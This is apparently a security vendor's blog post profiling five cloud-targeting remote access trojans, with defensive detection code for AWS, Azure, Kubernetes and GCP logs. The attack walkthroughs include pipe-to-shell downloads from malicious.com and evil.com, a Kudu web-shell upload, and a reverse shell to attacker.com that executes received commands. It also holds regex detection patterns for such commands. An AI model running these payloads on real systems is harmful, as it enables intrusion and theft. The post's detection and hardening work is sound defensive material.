Cloud infrastructure has become the backbone of modern businesses, but with greater scale comes a larger attack surface. In 2025, attackers are increasingly targeting cloud environments with Remote Access Trojans (RATs) built for them. These cloud-focused RATs aren’t just ported versions of traditional malware; they’re designed from the ground up to abuse cloud APIs, container orchestration systems, identity and access management (IAM), and ephemeral infrastructure.
In this blog, I’ll walk you through the five most dangerous cloud RATs I’ve come across this year. But before we get into the list, let’s take a moment to clarify what makes these RATs different from their mobile or traditional counterparts.
What Are Cloud-Focused Remote Access Trojans?
Unlike mobile or desktop RATs that typically rely on local persistence mechanisms, cloud-focused RATs are optimized to:
Exploit misconfigured IAM roles or API keys.
Spread laterally across multi-cloud setups.
Deploy and orchestrate containers or Lambda functions.
Remain persistent across stateless environments.
Here’s a minimal sketch of how a cloud RAT might start lateral movement in AWS: with stolen access keys already in its environment, it asks STS for temporary credentials for a more privileged role, possibly in another account:
import boto3

def assume_role(session_name, role_arn):
    # boto3 picks up whatever credentials are in the environment (here, the
    # stolen keys) and uses them to request temporary credentials for the role.
    sts_client = boto3.client('sts')
    assumed_role = sts_client.assume_role(
        RoleArn=role_arn,
        RoleSessionName=session_name
    )
    return assumed_role['Credentials']

# Attacker's RAT assumes a role in another account. This only succeeds if that
# role's trust policy lets the compromised principal assume it.
creds = assume_role("rat-session", "arn:aws:iam::123456789012:role/AdminRole")
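The role trust policy is what decides whether that pivot works, so the defensive counterpart is to audit trust policies before an attacker does. The following is an added example and not code from the post: it takes a role's trust policy document (the JSON that iam:GetRole returns in AssumeRolePolicyDocument) and reports principals that would let a RAT holding credentials elsewhere assume the role, including cross-account trusts that lack an sts:ExternalId condition. The account ids and the three policies are constructed for the example.

```python
import json

# Accounts this organisation owns (constructed example values, not from the post)
OWN_ACCOUNTS = {"123456789012", "210987654321"}

def _as_list(value):
    """IAM policy fields may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)

def _aws_principals(statement):
    """AWS principals of a statement; a bare Principal: "*" is returned as "*"."""
    principal = statement.get("Principal", {})
    if principal == "*":
        return ["*"]
    return _as_list(principal.get("AWS"))

def _account_of(principal):
    """Account id from an ARN or a bare 12-digit id; None if it cannot be parsed."""
    if principal.isdigit() and len(principal) == 12:
        return principal
    parts = principal.split(":")
    if len(parts) >= 6 and parts[4].isdigit():
        return parts[4]
    return None

def _requires_external_id(statement):
    """True when any condition block on the statement keys on sts:ExternalId."""
    return any("sts:ExternalId" in keys
               for keys in statement.get("Condition", {}).values())

def audit_trust_policy(policy, own_accounts=OWN_ACCOUNTS):
    """Return (severity, reason) findings for a role trust policy document."""
    findings = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action"))
        if not any(a in ("sts:AssumeRole", "sts:*", "*") for a in actions):
            continue
        for p in _aws_principals(stmt):
            acct = _account_of(p)
            if p == "*":
                findings.append(("critical", "assumable by any AWS principal (Principal: *)"))
            elif acct is None:
                findings.append(("medium", f"unrecognised principal {p}; review by hand"))
            elif acct not in own_accounts and _requires_external_id(stmt):
                findings.append(("info", f"cross-account trust of {p} gated by sts:ExternalId"))
            elif acct not in own_accounts:
                findings.append(("high", f"cross-account trust of {p} without sts:ExternalId"))
            elif p.endswith(":root"):
                # The account root principal means any IAM principal in that account
                # whose own policy allows sts:AssumeRole, not just the account owner.
                findings.append(("medium", f"trusts every principal in account {acct}"))
    return findings

# Constructed trust policies: the weak shapes a RAT looks for, and a hardened one
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]}

CROSS_ACCOUNT_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999999999999:root"},
     "Action": "sts:AssumeRole"}]}

HARDENED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/DeployRole"},
     "Action": "sts:AssumeRole",
     "Condition": {"StringEquals": {"aws:PrincipalOrgID": "o-exampleorgid"}}}]}

if __name__ == "__main__":
    for name, policy in [("weak", WEAK_POLICY), ("cross-account", CROSS_ACCOUNT_POLICY),
                         ("hardened", HARDENED_POLICY)]:
        print(name, json.dumps(audit_trust_policy(policy)))
```

Run it against the output of `aws iam list-roles` (each role carries its AssumeRolePolicyDocument) and treat anything at high or critical as a finding to fix the same day; the hardened shape is a specific role principal plus an aws:PrincipalOrgID condition.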
Now, let’s dive into the top 5 RATs targeting the cloud in 2025.
1. NimbusStrike
Overview: NimbusStrike is tailor-made for AWS environments. It gains a foothold via leaked or phished API keys and pivots using the AWS CLI and Boto3.
Implementation Strategy:
Starts with basic key validation using GetCallerIdentity.
Enumerates services using boto3.
Deploys backdoored Lambda functions or EC2 user-data scripts.
Code Walkthrough:
# Backdoor an EC2 instance using user-data
import boto3

# cloud-init runs this as root on first boot; boto3 base64-encodes the string
# before sending it to the API.
user_data_script = '''#!/bin/bash
curl -s http://malicious.com/payload.sh | bash
'''

ec2 = boto3.client('ec2')
ec2.run_instances(
    ImageId='ami-xyz',   # placeholder AMI id
    MinCount=1,
    MaxCount=1,
    UserData=user_data_script,
    InstanceType='t2.micro'
)
Detection Tip: Look for unusual RunInstances events, and for ModifyInstanceAttribute calls that change an instance's user-data. AWS CloudTrail records both, so it is where you spot anomalous callers, regions and instance types.
2. AzurePhantom
Overview: This RAT targets Microsoft Azure via the REST API. It abuses service principals and injects web shells into App Services.
Implementation Strategy:
Gains access using compromised client secrets.
Uses az rest and PowerShell to control cloud resources.
Deploys Kudu-based web shells.
Code Walkthrough (Web Shell Deployment):
# Upload through the Kudu VFS API, which maps /api/vfs/ onto the app's home
# directory, so site/wwwroot is the web root. Basic auth takes the deployment
# username and password (an empty username is rejected). APP_NAME is a placeholder.
curl -X PUT -u "$DEPLOYMENT_USER:$DEPLOYMENT_PASSWORD" \
  -H "If-Match: *" \
  -T shell.aspx \
  "https://$APP_NAME.scm.azurewebsites.net/api/vfs/site/wwwroot/shell.aspx"
Detection Tip: Monitor Kudu SCM API access and look for non-developer IPs pushing content to /wwwroot.
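One way to act on that tip, as an added example that is not the post's own code: filter the access records of the SCM site for write requests against the Kudu endpoints that land files in the app (the VFS and zip APIs under site/wwwroot, zip deploy and OneDeploy) and report the ones whose client address is outside the developer allowlist. The record fields (host, client_ip, method, path, status), the endpoint set and the four log lines are constructed for the example; map the fields onto whatever your log pipeline actually emits for the SCM site.

```python
import ipaddress
import json

# Kudu (SCM site) paths whose write methods land content in the app. This set is
# assumed for the example; extend it with whatever your deployment tooling uses.
KUDU_WRITE_PATH_PREFIXES = (
    "/api/vfs/site/wwwroot/",   # VFS API: direct file upload
    "/api/zip/site/wwwroot/",   # zip API: upload and extract
    "/api/zipdeploy",           # zip deploy
    "/api/publish",             # OneDeploy
)
WRITE_METHODS = {"PUT", "POST", "DELETE"}

# Developer egress ranges (constructed for the example)
DEVELOPER_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

def is_developer_ip(ip):
    """True when the client address falls inside a known developer network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in DEVELOPER_NETWORKS)

def is_kudu_write(record):
    """True for a write request to the SCM site that can place content in the app."""
    if not record["host"].endswith(".scm.azurewebsites.net"):
        return False
    if record["method"] not in WRITE_METHODS:
        return False
    return record["path"].startswith(KUDU_WRITE_PATH_PREFIXES)

def suspicious_kudu_writes(records):
    """Kudu write requests that did not originate from a developer network."""
    return [r for r in records
            if is_kudu_write(r) and not is_developer_ip(r["client_ip"])]

def parse_log(text):
    """One JSON object per line; the field names are a constructed simplification."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

# Constructed sample: a legitimate zip deploy, an upload of shell.aspx from an
# unknown address, a read-only directory listing, and a request to the main site
SAMPLE_LOG = """\
{"host": "shop.scm.azurewebsites.net", "client_ip": "203.0.113.7", "method": "POST", "path": "/api/zipdeploy", "status": 200}
{"host": "shop.scm.azurewebsites.net", "client_ip": "198.51.100.23", "method": "PUT", "path": "/api/vfs/site/wwwroot/shell.aspx", "status": 201}
{"host": "shop.scm.azurewebsites.net", "client_ip": "198.51.100.23", "method": "GET", "path": "/api/vfs/site/wwwroot/", "status": 200}
{"host": "shop.azurewebsites.net", "client_ip": "198.51.100.23", "method": "POST", "path": "/api/zipdeploy", "status": 404}
"""

if __name__ == "__main__":
    for hit in suspicious_kudu_writes(parse_log(SAMPLE_LOG)):
        print(f"ALERT {hit['client_ip']} {hit['method']} {hit['path']} -> HTTP {hit['status']}")
```

Only the PUT of shell.aspx from 198.51.100.23 is reported: the zip deploy came from the developer range, the directory listing is a read, and the last request hit the main site rather than the SCM site. Treating the allowlist as a hard boundary is the point; if developers deploy from anywhere, restrict SCM site access with the App Service access restrictions instead and alert on any hit at all.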
3. CloudSpectre
Overview: CloudSpectre is a container-native RAT that runs inside Kubernetes clusters. It spreads via exposed kubelet APIs and misconfigured dashboards.
Implementation Strategy:
Deploys as a sidecar container.
Uses Kubernetes API to enumerate nodes and secrets.
Uses stolen service-account tokens to act with whatever RBAC permissions those tokens carry.
Code Walkthrough (Pod Deployment):
apiVersion: v1
kind: Pod
metadata:
name: backdoor
spec:
containers:
- name: rat
image: attacker/reverse-shell:latest
command: ["/bin/sh", "-c", "curl http://evil.com/shell.sh | sh"]
Detection Tip: Audit your kube-apiserver audit logs and RBAC policy usage. Look for unapproved container images.
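Here is what that audit looks like in practice, as an added example rather than code from the post: it walks a kube-apiserver audit log in JSON-lines form and flags two things, pod creations whose images come from a registry outside the approved set (the spec above pulls attacker/reverse-shell:latest, which resolves to Docker Hub) and secrets reads by service accounts that have no reason to read them, which is how a stolen token surfaces. Registry names, the allowlisted secrets reader and the four audit events are constructed for the example.

```python
import json

# Registries your cluster is allowed to pull from (constructed values)
APPROVED_REGISTRIES = {"registry.example.internal",
                       "123456789012.dkr.ecr.us-east-1.amazonaws.com"}
# Service accounts that legitimately read secrets, e.g. a secrets operator (constructed)
SECRET_READERS = {"system:serviceaccount:kube-system:external-secrets"}

def image_registry(image):
    """Registry host of an image reference; Docker Hub when none is written."""
    first, sep, _ = image.partition("/")
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first
    return "docker.io"

def pod_images(pod_spec):
    """Every image a pod would run, init containers included."""
    containers = pod_spec.get("containers", []) + pod_spec.get("initContainers", [])
    return [c["image"] for c in containers]

def check_event(event):
    """Findings for one audit event as (kind, description) tuples."""
    findings = []
    ref = event.get("objectRef", {})
    verb = event.get("verb")
    user = event.get("user", {}).get("username", "")
    # Pod creation with an image outside the approved registries. requestObject is
    # only present at audit level Request/RequestResponse, so log pods at that level.
    if verb == "create" and ref.get("resource") == "pods":
        spec = event.get("requestObject", {}).get("spec", {})
        for image in pod_images(spec):
            if image_registry(image) not in APPROVED_REGISTRIES:
                findings.append(("unapproved-image",
                                 f"{user} created {ref.get('namespace')}/{ref.get('name')} with {image}"))
    # Secrets read by a service account that has no business reading them. A stolen
    # token shows up here as the pod's own identity, not as whoever stole it.
    if ref.get("resource") == "secrets" and verb in ("get", "list", "watch"):
        if user.startswith("system:serviceaccount:") and user not in SECRET_READERS:
            scope = f"namespace {ref['namespace']}" if ref.get("namespace") else "cluster-wide"
            findings.append(("secret-access", f"{user} {verb} secrets {scope}"))
    return findings

def scan_audit_log(text):
    """Run check_event over a JSON-lines audit log and collect the findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            findings.extend(check_event(json.loads(line)))
    return findings

# Constructed audit events: a normal deploy, the backdoor pod from a default
# service account, a cluster-wide secrets list by that account, and a legitimate read
SAMPLE_AUDIT_LOG = """\
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","stage":"ResponseComplete","verb":"create","user":{"username":"alice"},"sourceIPs":["10.0.0.9"],"objectRef":{"resource":"pods","namespace":"web","name":"frontend"},"responseStatus":{"code":201},"requestObject":{"spec":{"containers":[{"name":"web","image":"registry.example.internal/web:1.4"}]}}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"RequestResponse","stage":"ResponseComplete","verb":"create","user":{"username":"system:serviceaccount:default:default"},"sourceIPs":["10.0.1.5"],"objectRef":{"resource":"pods","namespace":"default","name":"backdoor"},"responseStatus":{"code":201},"requestObject":{"spec":{"containers":[{"name":"rat","image":"attacker/reverse-shell:latest"}]}}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","stage":"ResponseComplete","verb":"list","user":{"username":"system:serviceaccount:default:default"},"sourceIPs":["10.0.1.5"],"objectRef":{"resource":"secrets"},"responseStatus":{"code":200}}
{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","stage":"ResponseComplete","verb":"get","user":{"username":"system:serviceaccount:kube-system:external-secrets"},"sourceIPs":["10.0.0.3"],"objectRef":{"resource":"secrets","namespace":"prod","name":"db-creds"},"responseStatus":{"code":200}}
"""

if __name__ == "__main__":
    for kind, text in scan_audit_log(SAMPLE_AUDIT_LOG):
        print(f"[{kind}] {text}")
```

The registry rule mirrors how container runtimes resolve references: a first path segment with a dot, a colon or the word localhost is a registry host, anything else is Docker Hub. Denied attempts (responseStatus 403) are reported too, deliberately; a service account probing for secrets it cannot read is worth a look even when RBAC held.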
4. LambdaGhost
Overview: LambdaGhost specializes in ephemeral persistence by injecting itself into AWS Lambda layers. It rarely touches disk, so host- and image-based scanners seldom see it.
Implementation Strategy:
Attaches malicious Lambda layers to existing functions.
Uses obfuscated Python/Node.js payloads.
Uses CloudWatch Logs as a covert command-and-control channel.
Code Walkthrough (Python Layer Hijack):
# Sample RAT logic inside a Lambda layer
import socket

def backdoor():
    # Reverse shell: connect out to the operator and exec whatever comes back.
    # It lives only as long as the execution environment that imported the
    # layer, and never writes to the function's filesystem.
    s = socket.socket()
    s.connect(('attacker.com', 4444))
    while True:
        cmd = s.recv(1024).decode()
        exec(cmd)
Detection Tip: Track changes to Lambda layers and function configuration (PublishLayerVersion, UpdateFunctionConfiguration). Monitor outbound connections from Lambda functions: only VPC-attached functions appear in VPC Flow Logs, so attach functions to a VPC and route their egress through controls you actually watch.
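For the two CloudTrail tips on this page, the RunInstances and user-data note under NimbusStrike and the layer tracking here, the following is an added example and not the post's code. It flags UpdateFunctionConfiguration and CreateFunction events whose layer ARNs belong to an account you do not own, lists RunInstances calls that carried user-data, and scans a user-data script for download-and-execute patterns. CloudTrail records that user-data was supplied but redacts its content, so the scanner takes the base64 value that DescribeInstanceAttribute returns for the userData attribute; Lambda control-plane event names carry an API-version suffix (UpdateFunctionConfiguration20150331v2 and the like), hence the prefix matching. The account ids, events and user-data are constructed, and the example assumes the trail carries the layers list in requestParameters for these calls.

```python
import base64
import re

OWN_ACCOUNTS = {"123456789012"}   # constructed

# Download-and-execute and reverse-shell idioms that have no place in legitimate user-data
USER_DATA_PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b"),
    "base64-decode-exec": re.compile(r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba)?sh\b"),
    "dev-tcp-reverse-shell": re.compile(r"/dev/tcp/"),
}

def layer_account(layer_arn):
    """Account id in arn:aws:lambda:<region>:<account>:layer:<name>:<version>."""
    parts = layer_arn.split(":")
    return parts[4] if len(parts) >= 8 and parts[2] == "lambda" else None

def foreign_layer_events(events, own_accounts=OWN_ACCOUNTS):
    """Layer changes that attach a layer owned by another account."""
    hits = []
    for ev in events:
        name = ev.get("eventName", "")
        if not (name.startswith("UpdateFunctionConfiguration") or name.startswith("CreateFunction")):
            continue
        params = ev.get("requestParameters") or {}
        foreign = [arn for arn in params.get("layers") or []
                   if layer_account(arn) not in own_accounts]
        if foreign:
            hits.append((name, ev["userIdentity"]["arn"], params.get("functionName"), foreign))
    return hits

def run_instances_with_user_data(events):
    """RunInstances calls that carried user-data, with the instance ids they launched."""
    hits = []
    for ev in events:
        params = ev.get("requestParameters") or {}
        if ev.get("eventName") == "RunInstances" and "userData" in params:
            items = (ev.get("responseElements") or {}).get("instancesSet", {}).get("items", [])
            hits.append((ev["userIdentity"]["arn"], [i["instanceId"] for i in items]))
    return hits

def scan_user_data(b64_user_data):
    """Decode the base64 user-data from DescribeInstanceAttribute and name the patterns it matches."""
    text = base64.b64decode(b64_user_data).decode("utf-8", errors="replace")
    return sorted(name for name, rx in USER_DATA_PATTERNS.items() if rx.search(text))

# Constructed CloudTrail events; the userData placeholder stands in for the redacted value
SAMPLE_EVENTS = [
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deployer"},
     "requestParameters": {"functionName": "billing-api",
                           "layers": ["arn:aws:lambda:us-east-1:999999999999:layer:utils:3"]}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deployer"},
     "requestParameters": {"functionName": "reports",
                           "layers": ["arn:aws:lambda:us-east-1:123456789012:layer:common:7"]}},
    {"eventName": "RunInstances",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deployer"},
     "requestParameters": {"instanceType": "t2.micro", "userData": "<sensitiveDataRemoved>"},
     "responseElements": {"instancesSet": {"items": [{"instanceId": "i-0abc123def4567890"}]}}},
]
# Constructed user-data, base64-encoded the way DescribeInstanceAttribute returns it
SAMPLE_USER_DATA = base64.b64encode(
    b"#!/bin/bash\ncurl -s http://malicious.com/payload.sh | bash\n").decode()

if __name__ == "__main__":
    for name, actor, fn, layers in foreign_layer_events(SAMPLE_EVENTS):
        print(f"ALERT {actor} attached foreign layers {layers} to {fn} via {name}")
    for actor, instance_ids in run_instances_with_user_data(SAMPLE_EVENTS):
        # Live follow-up (not run here): for each id call
        #   ec2.describe_instance_attribute(InstanceId=iid, Attribute="userData")
        # and pass ["UserData"]["Value"] to scan_user_data.
        print(f"REVIEW {actor} launched {instance_ids} with user-data")
    print("user-data matches:", scan_user_data(SAMPLE_USER_DATA))
```

Only the billing-api change is reported as a foreign layer, and the constructed user-data matches the pipe-to-shell pattern. A layer from another account is not always hostile (vendors publish shared layers), so keep a list of vendor accounts beside your own; the payload in a hijacked layer is the code from the walkthrough above, so the layer ARN is often the only indicator that ever reaches CloudTrail.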
5. GCPReaper
Overview: This RAT hits Google Cloud environments, especially Compute Engine and Cloud Functions. It abuses service accounts and IAM impersonation.
Implementation Strategy:
Impersonates service accounts by minting short-lived OAuth access tokens for them through the IAM Service Account Credentials API (generateAccessToken).
Deploys Cloud Functions with malicious payloads.
Exfiltrates data via Google Sheets API.
Code Walkthrough (Function Deployment):
gcloud functions deploy exfil --runtime python39 \
--trigger-http --entry-point main \
--source=gs://evil-bucket/source.zip
Detection Tip: Cloud Functions deployments are recorded in the Admin Activity audit log (CreateFunction and UpdateFunction); alert on deployments whose source lives outside your own buckets, and use Security Command Center's Event Threat Detection to alert on service account abuse.
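Both halves of that tip can be checked from Cloud Audit Log entries exported as JSON lines. The following is an added example, not the post's code: it reports GenerateAccessToken calls against the IAM Service Account Credentials API by principals not on an impersonation allowlist, and Cloud Functions CreateFunction or UpdateFunction calls whose request references a gs:// bucket you do not own. Bucket names, principals and the four entries are constructed; the request field names follow the v1 API shape, but the bucket check works on the serialised request as a whole so a different shape still gets scanned.

```python
import json
import re

# Buckets that hold your function source (constructed)
OWN_BUCKETS = {"acme-prod-functions-src", "acme-staging-functions-src"}
# Principals allowed to mint tokens for service accounts (constructed)
ALLOWED_IMPERSONATORS = {"deploy-bot@acme-prod.iam.gserviceaccount.com"}
GS_URL = re.compile(r"gs://([^/\"\s]+)")

def payload(entry):
    return entry.get("protoPayload", {})

def caller(entry):
    return payload(entry).get("authenticationInfo", {}).get("principalEmail", "")

def impersonation_findings(entry):
    """Token minting for a service account by someone outside the allowlist."""
    p = payload(entry)
    if p.get("serviceName") != "iamcredentials.googleapis.com":
        return []
    if not p.get("methodName", "").endswith("GenerateAccessToken"):
        return []
    who = caller(entry)
    if who in ALLOWED_IMPERSONATORS:
        return []
    target = p.get("resourceName", "").rsplit("/", 1)[-1]
    ip = p.get("requestMetadata", {}).get("callerIp")
    return [("impersonation", f"{who} minted a token for {target} from {ip}")]

def function_source_findings(entry):
    """Function deployments that pull their source from a bucket you do not own."""
    p = payload(entry)
    method = p.get("methodName", "")
    if p.get("serviceName") != "cloudfunctions.googleapis.com":
        return []
    if not (method.endswith("CreateFunction") or method.endswith("UpdateFunction")):
        return []
    # Scan the whole request rather than one field so v1 and v2 shapes both work
    buckets = set(GS_URL.findall(json.dumps(p.get("request", {}))))
    foreign = sorted(b for b in buckets if b not in OWN_BUCKETS)
    if not foreign:
        return []
    return [("foreign-source",
             f"{caller(entry)} deployed {p.get('resourceName')} from {', '.join(foreign)}")]

def scan_entries(text):
    """Run both checks over JSON-lines audit log entries and collect the findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            entry = json.loads(line)
            findings.extend(impersonation_findings(entry))
            findings.extend(function_source_findings(entry))
    return findings

# Constructed entries: an allowed impersonation, an outside account minting a token for
# the admin service account, a deploy from an unknown bucket, and a normal deploy
SAMPLE_ENTRIES = """\
{"logName":"projects/acme-prod/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"serviceName":"iamcredentials.googleapis.com","methodName":"GenerateAccessToken","resourceName":"projects/-/serviceAccounts/deploy@acme-prod.iam.gserviceaccount.com","authenticationInfo":{"principalEmail":"deploy-bot@acme-prod.iam.gserviceaccount.com"},"requestMetadata":{"callerIp":"10.128.0.4"}}}
{"logName":"projects/acme-prod/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"serviceName":"iamcredentials.googleapis.com","methodName":"GenerateAccessToken","resourceName":"projects/-/serviceAccounts/admin@acme-prod.iam.gserviceaccount.com","authenticationInfo":{"principalEmail":"contractor@example.com"},"requestMetadata":{"callerIp":"198.51.100.77"}}}
{"logName":"projects/acme-prod/logs/cloudaudit.googleapis.com%2Factivity","protoPayload":{"serviceName":"cloudfunctions.googleapis.com","methodName":"google.cloud.functions.v1.CloudFunctionsService.CreateFunction","resourceName":"projects/acme-prod/locations/us-central1/functions/exfil","authenticationInfo":{"principalEmail":"admin@acme-prod.iam.gserviceaccount.com"},"request":{"function":{"name":"projects/acme-prod/locations/us-central1/functions/exfil","sourceArchiveUrl":"gs://evil-bucket/source.zip","httpsTrigger":{}}}}}
{"logName":"projects/acme-prod/logs/cloudaudit.googleapis.com%2Factivity","protoPayload":{"serviceName":"cloudfunctions.googleapis.com","methodName":"google.cloud.functions.v1.CloudFunctionsService.CreateFunction","resourceName":"projects/acme-prod/locations/us-central1/functions/api","authenticationInfo":{"principalEmail":"deploy-bot@acme-prod.iam.gserviceaccount.com"},"request":{"function":{"name":"projects/acme-prod/locations/us-central1/functions/api","sourceArchiveUrl":"gs://acme-prod-functions-src/api.zip"}}}}
"""

if __name__ == "__main__":
    for kind, text in scan_entries(SAMPLE_ENTRIES):
        print(f"[{kind}] {text}")
```

Two findings come out: the contractor minting a token for the admin service account, and the admin service account (now driven by whoever holds that token) deploying the exfil function from evil-bucket. Note that GenerateAccessToken is a Data Access audit entry, so Data Access logging must be enabled for the IAM Service Account Credentials API or the first finding never reaches your logs; the deployment is Admin Activity and is always recorded.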
Conclusion
Cloud-focused RATs are a different beast altogether. They exploit the abstraction and automation of cloud services to hide, persist, and move laterally. Tools like NimbusStrike and AzurePhantom don’t need traditional persistence mechanisms; they thrive on IAM misconfigurations and poorly monitored serverless functions.
If you’re in charge of cloud security, it’s not enough to secure your EC2 or S3. You need to:
Continuously rotate and audit your API keys.
Enforce least privilege policies on IAM.
Route all deployments through CI/CD pipelines and alert on changes made outside them.
Enable real-time alerting for cloud-native operations.
These threats are real, and they’re only growing more stealthy with each iteration. Hopefully, this guide gave you some practical insight into the landscape of cloud-based RATs in 2025.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!